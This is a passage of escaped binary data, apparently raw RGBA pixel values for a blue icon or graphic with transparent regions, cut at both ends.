x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00d\xffR\x00d\xffR\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00d\xff\x92\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00d\xff\x92\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xce\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00c\xff\xce\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00b\xffr\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb1\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00e\xffQ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00d\xffO\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00b\xff\x91\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00b\xff\x91\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xcd\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00f\xff2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffq\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf2\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00b\xff\xae\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb0\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00b\xff\xae\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb0\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00d\xffn\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00d\xffp\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf2\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xcd\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00f\xff2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00b\xff\x91\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00b\xff\x91\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00e\xffQ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\xffQ\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00d\xffO\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb1\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffq\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xce\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00b\xff\x91\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00b\xff\x91\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00d\xffR\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00d\xffR\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00d\xff\x92\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00b\xff\x91\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c